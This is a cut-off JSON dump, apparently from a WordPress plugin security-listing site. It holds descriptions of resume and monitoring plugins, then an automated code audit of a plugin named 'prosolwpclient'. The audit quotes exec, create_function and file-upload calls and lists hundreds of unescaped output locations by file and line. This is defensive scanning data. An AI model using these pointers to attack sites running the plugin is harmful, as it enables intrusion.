Included:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Personal Profile\u003C\u002Fli>\n\u003Cli>Career Summary\u003C\u002Fli>\n\u003Cli>Contact Information\u003C\u002Fli>\n\u003Cli>Social Network: Twitter & FaceBook\u003C\u002Fli>\n\u003Cli>Skills\u003C\u002Fli>\n\u003Cli>Education Information\u003C\u002Fli>\n\u003Cli>Experience History\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>➡️ Benefits you’ll get by using this plugin:**\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Convert your unused domain into a resume landing page\u003C\u002Fli>\n\u003Cli>Replicated your print resume for the web\u003C\u002Fli>\n\u003Cli>Sent recruiters to it and get hired!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>➡️ Useage of Shortcode:⬅️\u003C\u002Fp>\n\u003Cp>\u003Cstrong> To display resume use the below shortcode \u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cpre> [hm_resume_manager] \u003C\u002Fpre>\n\u003Cp>\u003Cstrong>📋 Feedback\u002FRating:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>If you find this plugin helpful, feel free to give us your valuable review. Rate us and share this plugin with your friends and others. 
This will motivate us and help us to grow.\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fhm-resume-manager\u002Freviews\u002F#new-post\" rel=\"ugc\">Rate Us\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🔥 Other Plugins from \u003Ca href=\"https:\u002F\u002Fhmplugin.com\" rel=\"nofollow ugc\">HM Plugins\u003C\u002Fa>:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-books-gallery\u002F\" rel=\"ugc\">WP Books Gallery\u003C\u002Fa> Books Gallery Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fworldwide-breaking-news-headlines\u002F\" rel=\"ugc\">Worldwide Breaking News Headlines\u003C\u002Fa> Breaking News, Headlines Widget Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-top-news\u002F\" rel=\"ugc\">WP Top News\u003C\u002Fa> Top News, Breaking News, Headlines Shortcoded Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-stripe-donation\u002F\" rel=\"ugc\">WordPress Stripe Donation\u003C\u002Fa> Donations Coolection Plugin for WordPress using Stripe Payement\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Ftiny-bar\u002F\" rel=\"ugc\">Tiny Bar\u003C\u002Fa> Message Bar Plugin for WordPress to display Message at Top\u002FBottom Bar of a web page\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-cool-author-box-widget\u002F\" rel=\"ugc\">HM – Cool Author Box\u003C\u002Fa> Author Box plugin for WordPress to display author info\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-resume-manager\u002F\" rel=\"ugc\">HM Resume Manager\u003C\u002Fa> A Resume\u002FCV Manager Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca 
href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-product-catalog\u002F\" rel=\"ugc\">HM Product Catalog\u003C\u002Fa> A Product Catalog Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-wc-product-advertiser\u002F\" rel=\"ugc\">HM Wc Product Advertiser\u003C\u002Fa> Product Advertiser Plugin for Wocommerce\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-scroll-to-post\u002F\" rel=\"ugc\">WP Scroll To Post\u003C\u002Fa> Display random post(Single) at the bottom right corner\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-recent-posts-widget\u002F\" rel=\"ugc\">HM Recent Posts Widget\u003C\u002Fa> Ticker Post plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-alert-bars\u002F\" rel=\"ugc\">WP Alert Bars\u003C\u002Fa> Notification\u002FAlert box Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-simple-facebook-page\u002F\" rel=\"ugc\">FaceBook LikeBox\u003C\u002Fa> A FaceBook LikeBox Plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwp-display-faq\u002F\" rel=\"ugc\">WP Display FAQ\u003C\u002Fa> FAQs manager plugin for WordPress\u003Cbr \u002F>\n👉 \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-logo-showcase\u002F\" rel=\"ugc\">HM Logo Showcase\u003C\u002Fa> Logo manager plugin for WordPress\u003C\u002Fp>\n","WordPress Resume Manager plugin to display and manage personal resume or CV at your WordPress 
webpage.",7467,"2025-02-06T21:04:00.000Z","6.7.5","5.4","7.2",[108,20,21,86,88],"cv","http:\u002F\u002Fwordpress.org\u002Fplugins\u002Fhm-resume-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhm-resume-manager.2.4.1.zip",92,{"slug":113,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":91,"downloaded":120,"rating":121,"num_ratings":27,"last_updated":122,"tested_up_to":104,"requires_at_least":123,"requires_php":124,"tags":125,"homepage":131,"download_link":132,"security_score":111,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"site24x7-rum","Site24x7 Real User Monitoring","1.3","Site24x7","https:\u002F\u002Fprofiles.wordpress.org\u002Fsite24x7integrations\u002F","\u003Cp>Real User Monitoring by Site24x7 gives accurate insight into real users application experience and helps visualise web app interaction patterns. Real User Monitoring provides deep insight into key performance metrics right from the initiation of the URL until the request is served back to the browser.\u003C\u002Fp>\n\u003Cp>The RUM plugin helps you add your Site24x7 RUM code snippet to the Head tag of your WordPress blog. Once added, Site24x7 immediately starts collecting data from your WordPress blog’s visitors. You can view all that collected data in \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fapp\u002Fapm#\u002Fapm\u002Frum\u002Flist\u002F\" rel=\"nofollow ugc\">Site24x7 console\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Site24x7 Real User Monitoring provides better understanding of performance issues by providing actionable data like showing real user performance by region, browser type, device used to access the application and more, these metric assist in pinpointing issues faster to make applications more fluid and user friendly. 
The back-end response time provides metrics from a server perspective calculating the time taken by the server to serve the request and statistics such as the page rendering time, document processing time and document downloading time, all of which help developers tailor applications to be more fluid to end users. Please refer to the help document for more information \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fhelp\u002Fapm\u002Frum.html\" rel=\"nofollow ugc\">site24x7-rum\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>P.S: You will need a Site24x7 account for this plugin. If you don’t have one, grab one at \u003Ca href=\"https:\u002F\u002Fwww.site24x7.com\u002Fsignup.html?pack=4&l=en\" rel=\"nofollow ugc\">site24x7.com\u003C\u002Fa> – it’s super-easy!\u003C\u002Fp>\n","Real User Monitoring (RUM) by Site24x7 provides deep and accurate insight into real users’ experience on your WordPress setup.",3742,80,"2025-01-22T12:28:00.000Z","2.8","5.2.4",[126,127,128,129,130],"application-performance","real-user-monitoring","rum","user-experience-monitoring","website-monitoring","https:\u002F\u002Fwww.site24x7.com\u002Freal-user-monitoring.html","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsite24x7-rum.1.3.zip",{"slug":134,"name":135,"version":136,"author":137,"author_profile":138,"description":139,"short_description":140,"active_installs":91,"downloaded":141,"rating":142,"num_ratings":143,"last_updated":144,"tested_up_to":145,"requires_at_least":73,"requires_php":146,"tags":147,"homepage":150,"download_link":151,"security_score":152,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"wp-resume","WP Resume","2.5.7","Ben Balter","https:\u002F\u002Fprofiles.wordpress.org\u002Fbenbalter\u002F","\u003Cp>WP Resume is an out-of-the-box solution to get your resume online and keep it updated. Built on WordPress 3.0’s custom post type functionality, it offers a uniquely familiar approach to publishing. 
If you’ve got a WordPress site, you already know how to use WP Resume.\u003C\u002Fp>\n\u003Cp>You can \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002Fresume\u002F\" rel=\"nofollow ugc\">see it in action\u003C\u002Fa> or for information and troubleshooting, check out the \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002F2010\u002F09\u002F12\u002Fwordpress-resume-plugin\u002F\" rel=\"nofollow ugc\">Plugin Homepage\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Features include:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Support for sections (e.g., education, experience), organizations (e.g., somewhere state university, Cogs, Inc.), positions (e.g., bachelor of arts, chief widget specialist), and details (e.g., grew bottom line by 15%, president of the sustainability club)\u003C\u002Fli>\n\u003Cli>Supports multiple resumes, on the same page, or on their own\u003C\u002Fli>\n\u003Cli>Follows best practices in resume layout and design\u003C\u002Fli>\n\u003Cli>One click install, just start adding content\u003C\u002Fli>\n\u003Cli>Drag and drop ordering of resume elements\u003C\u002Fli>\n\u003Cli>Outputs in \u003Ca href=\"http:\u002F\u002Fmicroformats.org\u002Fwiki\u002Fhresume\" rel=\"nofollow ugc\">hResume\u003C\u002Fa> compatible format using HTMl5 semantic tags\u003C\u002Fli>\n\u003Cli>Can output as plain text for pasting into job applications\u003C\u002Fli>\n\u003Cli>Automatically saves revisions of every change you make\u003C\u002Fli>\n\u003Cli>The WYSIWYG editing experience you know and love\u003C\u002Fli>\n\u003Cli>Integrates with your theme like they were made for each other (via a shortcode)\u003C\u002Fli>\n\u003Cli>Spanish, Portuguese (BR), and French Translation Support\u003C\u002Fli>\n\u003Cli>Does not use pretentious accents on the word “resume”\u003C\u002Fli>\n\u003Cli>Extremely original title\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Under the hood:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Built on existing WordPress code, utilizing a single custom post type and two 
custom taxonomies\u003C\u002Fli>\n\u003Cli>JSON API so you can use the data anywhere\u003C\u002Fli>\n\u003Cli>Support for custom templates and CSS files (like a child theme, just place them in your theme directory)\u003C\u002Fli>\n\u003Cli>Plugin API hooks for developers to build on\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The hardest part of getting your resume online should be doing the work listed on it, not wrestling the publishing platform. Simply put, WP Resume steps aside and lets your experience shine.\u003C\u002Fp>\n\u003Ch4>Translations:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Spanish – \u003Ca href=\"http:\u002F\u002Frodbuaiz.com\u002F\" rel=\"nofollow ugc\">Rodolfo Buaiz\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Portuguese – \u003Ca href=\"http:\u002F\u002Frodbuaiz.com\u002F\" rel=\"nofollow ugc\">Rodolfo Buaiz\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>French – phpcore\u003C\u002Fli>\n\u003Cli>Slovak Translation – Branco of \u003Ca href=\"http:\u002F\u002Fwebhostinggeeks.com\u002Fuser-reviews\u002F\" rel=\"nofollow ugc\">WebHostingGeeks.com\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Developers,\u003C\u002Fstrong> have a killer feature you’d love to see included? Feel free to \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002F\" rel=\"nofollow ugc\">fork the project on GitHub\u003C\u002Fa> and submit your contributions via pull request.\u003C\u002Fp>\n\u003Cp>[Photo via \u003Ca href=\"http:\u002F\u002Fwww.flickr.com\u002Fphotos\u002Fshawnmichael\u002F4246330043\u002F\" rel=\"nofollow ugc\">shawnmichael\u003C\u002Fa>]\u003C\u002Fp>\n\u003Ch3>Donate\u003C\u002Fh3>\n\u003Cp>\u003Cem>Enjoy using WP Resume? 
Please consider \u003Ca href=\"http:\u002F\u002Fben.balter.com\u002Fdonate\u002F\" rel=\"nofollow ugc\">making a small donation\u003C\u002Fa> to support the software’s continued development.\u003C\u002Fem>\u003C\u002Fp>\n\u003Ch3>How To Contribute\u003C\u002Fh3>\n\u003Cp>WP Resume is an open source project and is supported by the efforts of an entire community. We’d love for you to get involved. Whatever your level of skill or however much time you can give, your contribution is greatly appreciated.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Everyone\u003C\u002Fstrong> – help expand the projects \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fwiki\" rel=\"nofollow ugc\">documentation wiki\u003C\u002Fa> to make it easier for other users to get started\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Users\u003C\u002Fstrong> – download the latest \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Ftree\u002Fdevelop\" rel=\"nofollow ugc\">development version\u003C\u002Fa> of the plugin, and \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues\" rel=\"nofollow ugc\">submit bug\u002Ffeature requests\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Non-English Speaking Users\u003C\u002Fstrong> – \u003Ca href=\"http:\u002F\u002Ftranslations.benbalter.com\u002Fprojects\u002FWP-Resume\u002F\" rel=\"nofollow ugc\">Contribute a translation\u003C\u002Fa> using the GlotPress web interface – no technical knowledge required (\u003Ca href=\"http:\u002F\u002Ftranslations.benbalter.com\u002Fprojects\u002Fhow-to-translate\" rel=\"nofollow ugc\">how to\u003C\u002Fa>).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Developers\u003C\u002Fstrong> – \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Ftree\u002Fdevelop\" rel=\"nofollow ugc\">Fork the development version\u003C\u002Fa> and submit a pull request, especially for any \u003Ca 
href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues?direction=desc&sort=created&state=open\" rel=\"nofollow ugc\">known issues\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Where To Get Support Or Report An Issue\u003C\u002Fh3>\n\u003Cp>\u003Cem>There are various resources available, depending on the type of help you’re looking for:\u003C\u002Fem>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>For getting started and general documentation, please browse, and feel free to contribute to \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fwiki\" rel=\"nofollow ugc\">the project wiki\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For support questions (“How do I”, “I can’t seem to”, etc.) please search and if not already answered, open a thread in the \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002FWP-Resume\" rel=\"ugc\">Support Forums\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For technical issues (e.g., to submit a bug or feature request) please search and if not already filed, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbenbalter\u002FWP-Resume\u002Fissues\" rel=\"nofollow ugc\">open an issue on GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>For implementation, and all general questions (“Is it possible to..”, “Has anyone…”), please search, and if not already answered, post a topic to the \u003Ca href=\"https:\u002F\u002Fgroups.google.com\u002Fforum\u002F#!forum\u002FWP-Resume\" rel=\"nofollow ugc\">general discussion list serve\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n","Out-of-the-box solution to get your resume online. 
Built on WordPress's custom post types, it offers a uniquely familiar approach to publishing",46496,46,6,"2014-12-28T20:39:00.000Z","3.6.1","",[20,21,148,149,86],"online-reputation","personal-branding","http:\u002F\u002Fben.balter.com\u002F2010\u002F09\u002F12\u002Fwordpress-resume-plugin\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-resume.2.5.7.zip",85,{"slug":154,"name":155,"version":156,"author":157,"author_profile":158,"description":159,"short_description":160,"active_installs":161,"downloaded":162,"rating":13,"num_ratings":13,"last_updated":163,"tested_up_to":164,"requires_at_least":165,"requires_php":146,"tags":166,"homepage":169,"download_link":170,"security_score":152,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"bp-resume-page","BP Resume Page","1.0","fmeroney","https:\u002F\u002Fprofiles.wordpress.org\u002Ffmeroney\u002F","\u003Cp>Need to add an online resume to BuddyPress? We developed a plugin that is small and compact just for you. It gives the member the ability to add “Education”, “Professional Experience”, and “Skills” to their profile. It sorts the users entries by date, newest first, and allows them to delete unwanted entries. Simple to use, and follows the BuddyPress theme.\u003C\u002Fp>\n\u003Cp>There are no backend settings to configure, it’s all frontend, just that simple.\u003C\u002Fp>\n","Adds a resume page to BuddyPress profile. 
Also adds nav menu item under Avatar and in admin bar.",10,9288,"2012-06-04T03:02:00.000Z","3.3.2","3.0",[167,168,20,23,86],"buddy","buddypress","http:\u002F\u002Fscenicjobs.com\u002Fwordpress-plugins","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbp-resume-page.zip",{"attackSurface":172,"codeSignals":202,"taintFlows":1328,"riskAssessment":1582,"analyzedAt":1598},{"hooks":173,"ajaxHandlers":190,"restRoutes":191,"shortcodes":192,"cronEvents":197,"entryPointCount":27,"unprotectedCount":13},[174,181,186],{"type":175,"name":176,"callback":177,"priority":178,"file":179,"line":180},"action","http_api_curl","sar_custom_curl_timeout",9999,"public\u002Fclass-prosolwpclient-public.php",2001,{"type":182,"name":183,"callback":184,"priority":178,"file":179,"line":185},"filter","http_request_timeout","sar_custom_http_request_timeout",2002,{"type":182,"name":187,"callback":188,"priority":178,"file":179,"line":189},"http_request_args","sar_custom_http_request_args",2003,[],[],[193],{"tag":194,"callback":195,"file":179,"line":196},"prosolfrontend","proSol_prosolwpclientShortcode",65,[198],{"hook":199,"callback":199,"file":200,"line":201},"wp_ajax_proSol_dailytask_tableJobs","includes\u002Fclass-prosolwpclient-table-helper.php",356,{"dangerousFunctions":203,"sqlUsage":237,"outputEscaping":240,"fileOperations":1201,"externalRequests":81,"nonceChecks":1323,"capabilityChecks":50,"bundledLibraries":1324},[204,209,211,215,219,222,225,230,233,235],{"fn":205,"file":206,"line":207,"context":208},"exec","includes\u002FUploadHandler.php",971,"exec($cmd, $output, $error);",{"fn":205,"file":206,"line":210,"context":208},997,{"fn":212,"file":206,"line":213,"context":214},"move_uploaded_file",1090,"move_uploaded_file($uploaded_file, $file_path);",{"fn":216,"file":200,"line":217,"context":218},"ini_set",461,"ini_set('xdebug.var_display_max_depth', -1);",{"fn":216,"file":200,"line":220,"context":221},462,"ini_set('xdebug.var_display_max_children', 
-1);",{"fn":216,"file":200,"line":223,"context":224},463,"ini_set('xdebug.var_display_max_data', -1);",{"fn":226,"file":227,"line":228,"context":229},"create_function","includes\u002Fclass-setting.php",148,"$callback        = create_function( '', 'echo \"' . str_replace( '\"', '\\\"', $section['desc'] ) . '\";'",{"fn":205,"file":231,"line":232,"context":208},"public\u002Fjs\u002FjQuery-File-Upload-master\u002Fserver\u002Fphp\u002FUploadHandler.php",1025,{"fn":205,"file":231,"line":234,"context":208},1051,{"fn":212,"file":231,"line":236,"context":214},1165,{"prepared":238,"raw":13,"locations":239},250,[],{"escaped":241,"rawEcho":242,"locations":243},1654,688,[244,248,250,252,255,256,257,259,261,263,264,266,269,270,271,274,276,277,279,281,282,283,284,286,288,290,292,293,295,297,299,301,303,305,307,309,311,313,315,317,318,320,322,324,326,328,330,332,334,336,338,340,342,344,346,348,350,352,354,356,358,360,362,363,365,367,369,371,373,375,377,378,380,381,383,385,387,389,391,393,395,397,399,401,403,406,409,410,412,414,416,417,419,421,423,425,427,429,431,433,435,437,439,441,443,444,446,448,450,452,454,456,458,460,462,464,466,468,470,472,474,476,478,480,482,484,486,488,490,492,494,496,499,501,503,505,507,509,511,513,515,517,519,521,523,525,527,528,530,532,534,536,537,538,540,542,544,546,547,549,551,553,555,557,558,560,562,564,566,569,571,573,575,577,579,581,583,584,585,587,588,590,591,593,595,596,598,600,602,604,605,607,609,611,613,615,616,618,620,622,624,626,628,630,632,634,635,637,639,641,643,645,647,649,651,653,655,657,658,660,662,664,666,668,670,672,674,676,678,679,680,681,683,685,687,689,690,692,693,696,698,700,702,705,707,709,710,712,713,715,716,718,719,720,721,723,724,726,727,729,730,731,732,734,735,737,738,740,741,744,745,747,748,750,751,753,754,756,757,758,759,760,761,763,764,765,766,768,769,771,772,774,775,777,778,780,781,783,784,786,787,789,790,792,793,794,795,796,797,799,800,801,802,804,805,807,808,810,811,813,814,816,817,819,820,822,823,825,826,828,829,831,832,8
34,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,919,920,921,922,924,925,926,927,929,930,932,933,935,936,938,939,940,941,943,944,946,948,950,952,954,956,958,959,960,961,962,963,965,967,969,971,972,974,976,977,979,981,982,984,985,987,988,990,992,994,995,997,998,1000,1002,1004,1005,1006,1008,1009,1011,1012,1014,1016,1018,1019,1021,1022,1024,1026,1028,1029,1032,1034,1036,1038,1039,1041,1042,1043,1044,1045,1046,1048,1050,1051,1053,1055,1056,1057,1059,1060,1061,1062,1063,1064,1065,1067,1068,1070,1072,1073,1074,1076,1078,1079,1080,1082,1084,1086,1088,1089,1090,1091,1093,1095,1096,1097,1098,1100,1101,1102,1103,1104,1106,1107,1108,1109,1111,1113,1114,1115,1117,1119,1121,1122,1124,1125,1127,1128,1130,1131,1133,1135,1137,1138,1139,1140,1141,1143,1144,1146,1147,1149,1150,1152,1154,1156,1157,1159,1160,1162,1164,1166,1167,1169,1170,1172,1174,1176,1177,1179,1180,1182,1184,1185,1187,1188,1189,1191,1193,1194,1195,1196,1198,1200,1202,1203,1204,1205,1208,1209,1211,1212,1213,1214,1215,1216,1218,1219,1221,1222,1223,1225,1226,1227,1228,1230,1232,1233,1234,1236,1237,1239,1240,1241,1242,1244,1245,1246,1247,1248,1249,1251,1252,1254,1256,1258,1259,1261,1263,1265,1267,1269,1271,1272,1273,1275,1277,1278,1280,1281,1283,1285,1287,1288,1289,1290,1291,1293,1294,1295,1296,1297,1298,1299,1300,1301,1302,1303,1304,1305,1306,1307,1308,1310,1312,1313,1315,1316,1317,1319,1321],{"file":245,"line":246,"context":247},"admin\u002Fclass-prosolwpclient-admin.php",338,"raw 
output",{"file":245,"line":249,"context":247},351,{"file":245,"line":251,"context":247},425,{"file":253,"line":254,"context":247},"admin\u002Ftemplates\u002Fadmin-overview.php",25,{"file":253,"line":254,"context":247},{"file":253,"line":254,"context":247},{"file":253,"line":258,"context":247},42,{"file":253,"line":260,"context":247},105,{"file":253,"line":262,"context":247},143,{"file":253,"line":228,"context":247},{"file":253,"line":265,"context":247},198,{"file":267,"line":268,"context":247},"admin\u002Ftemplates\u002Fadmin-settings-display.php",31,{"file":267,"line":268,"context":247},{"file":267,"line":268,"context":247},{"file":272,"line":273,"context":247},"admin\u002Ftemplates\u002Fadmin-view-single-table-list.php",36,{"file":272,"line":275,"context":247},40,{"file":272,"line":258,"context":247},{"file":272,"line":278,"context":247},51,{"file":272,"line":280,"context":247},55,{"file":272,"line":280,"context":247},{"file":272,"line":280,"context":247},{"file":272,"line":152,"context":247},{"file":206,"line":285,"context":247},1124,{"file":206,"line":287,"context":247},1135,{"file":227,"line":289,"context":247},358,{"file":227,"line":291,"context":247},396,{"file":227,"line":251,"context":247},{"file":227,"line":294,"context":247},588,{"file":227,"line":296,"context":247},717,{"file":227,"line":298,"context":247},751,{"file":227,"line":300,"context":247},780,{"file":227,"line":302,"context":247},818,{"file":227,"line":304,"context":247},838,{"file":227,"line":306,"context":247},851,{"file":227,"line":308,"context":247},875,{"file":227,"line":310,"context":247},898,{"file":227,"line":312,"context":247},965,{"file":227,"line":314,"context":247},983,{"file":227,"line":316,"context":247},1007,{"file":227,"line":232,"context":247},{"file":227,"line":319,"context":247},1029,{"file":227,"line":321,"context":247},1040,{"file":227,"line":323,"context":247},1059,{"file":227,"line":325,"context":247},1074,{"file":227,"line":327,"context":247},1095,{"file":227,"line":329,"
context":247},1121,{"file":227,"line":331,"context":247},1147,{"file":227,"line":333,"context":247},1162,{"file":227,"line":335,"context":247},1178,{"file":227,"line":337,"context":247},1188,{"file":227,"line":339,"context":247},1198,{"file":227,"line":341,"context":247},1216,{"file":227,"line":343,"context":247},1450,{"file":227,"line":345,"context":247},1462,{"file":179,"line":347,"context":247},516,{"file":179,"line":349,"context":247},771,{"file":179,"line":351,"context":247},798,{"file":179,"line":353,"context":247},821,{"file":179,"line":355,"context":247},830,{"file":179,"line":357,"context":247},854,{"file":179,"line":359,"context":247},855,{"file":179,"line":361,"context":247},879,{"file":179,"line":361,"context":247},{"file":179,"line":364,"context":247},880,{"file":179,"line":366,"context":247},881,{"file":179,"line":368,"context":247},882,{"file":179,"line":370,"context":247},883,{"file":179,"line":372,"context":247},894,{"file":179,"line":374,"context":247},895,{"file":179,"line":376,"context":247},896,{"file":179,"line":376,"context":247},{"file":179,"line":379,"context":247},897,{"file":179,"line":310,"context":247},{"file":179,"line":382,"context":247},899,{"file":179,"line":384,"context":247},900,{"file":179,"line":386,"context":247},901,{"file":179,"line":388,"context":247},902,{"file":179,"line":390,"context":247},947,{"file":179,"line":392,"context":247},1100,{"file":179,"line":394,"context":247},1142,{"file":179,"line":396,"context":247},1259,{"file":179,"line":398,"context":247},2165,{"file":231,"line":400,"context":247},1203,{"file":231,"line":402,"context":247},1214,{"file":404,"line":405,"context":247},"public\u002Ftemplates\u002Fprosolwpclientcrawler.php",61,{"file":407,"line":408,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobapply.php",82,{"file":407,"line":152,"context":247},{"file":407,"line":411,"context":247},86,{"file":407,"line":413,"context":247},91,{"file":407,"line":415,"context":247},95,{"file":407,"line":67,"contex
t":247},{"file":407,"line":418,"context":247},97,{"file":407,"line":420,"context":247},134,{"file":407,"line":422,"context":247},138,{"file":407,"line":424,"context":247},144,{"file":407,"line":426,"context":247},156,{"file":407,"line":428,"context":247},160,{"file":407,"line":430,"context":247},165,{"file":407,"line":432,"context":247},232,{"file":407,"line":434,"context":247},295,{"file":407,"line":436,"context":247},304,{"file":407,"line":438,"context":247},363,{"file":407,"line":440,"context":247},402,{"file":407,"line":442,"context":247},413,{"file":407,"line":251,"context":247},{"file":407,"line":445,"context":247},427,{"file":407,"line":447,"context":247},436,{"file":407,"line":449,"context":247},438,{"file":407,"line":451,"context":247},554,{"file":407,"line":453,"context":247},555,{"file":407,"line":455,"context":247},556,{"file":407,"line":457,"context":247},557,{"file":407,"line":459,"context":247},558,{"file":407,"line":461,"context":247},559,{"file":407,"line":463,"context":247},560,{"file":407,"line":465,"context":247},561,{"file":407,"line":467,"context":247},562,{"file":407,"line":469,"context":247},563,{"file":407,"line":471,"context":247},564,{"file":407,"line":473,"context":247},565,{"file":407,"line":475,"context":247},579,{"file":407,"line":477,"context":247},595,{"file":407,"line":479,"context":247},597,{"file":407,"line":481,"context":247},607,{"file":407,"line":483,"context":247},609,{"file":407,"line":485,"context":247},620,{"file":407,"line":487,"context":247},622,{"file":407,"line":489,"context":247},633,{"file":407,"line":491,"context":247},637,{"file":407,"line":493,"context":247},682,{"file":407,"line":495,"context":247},695,{"file":497,"line":498,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobdetails.php",115,{"file":497,"line":500,"context":247},120,{"file":497,"line":502,"context":247},203,{"file":497,"line":504,"context":247},211,{"file":497,"line":506,"context":247},218,{"file":497,"line":508,"context":247},225,{"file"
:497,"line":510,"context":247},230,{"file":497,"line":512,"context":247},238,{"file":497,"line":514,"context":247},243,{"file":497,"line":516,"context":247},251,{"file":497,"line":518,"context":247},262,{"file":497,"line":520,"context":247},280,{"file":497,"line":522,"context":247},299,{"file":497,"line":524,"context":247},318,{"file":497,"line":526,"context":247},327,{"file":497,"line":246,"context":247},{"file":497,"line":529,"context":247},343,{"file":497,"line":531,"context":247},348,{"file":497,"line":533,"context":247},424,{"file":497,"line":535,"context":247},464,{"file":497,"line":535,"context":247},{"file":497,"line":535,"context":247},{"file":497,"line":539,"context":247},484,{"file":497,"line":541,"context":247},492,{"file":497,"line":543,"context":247},499,{"file":497,"line":545,"context":247},509,{"file":497,"line":545,"context":247},{"file":497,"line":548,"context":247},517,{"file":497,"line":550,"context":247},519,{"file":497,"line":552,"context":247},526,{"file":497,"line":554,"context":247},528,{"file":497,"line":556,"context":247},531,{"file":497,"line":556,"context":247},{"file":497,"line":559,"context":247},539,{"file":497,"line":561,"context":247},541,{"file":497,"line":563,"context":247},548,{"file":497,"line":565,"context":247},550,{"file":567,"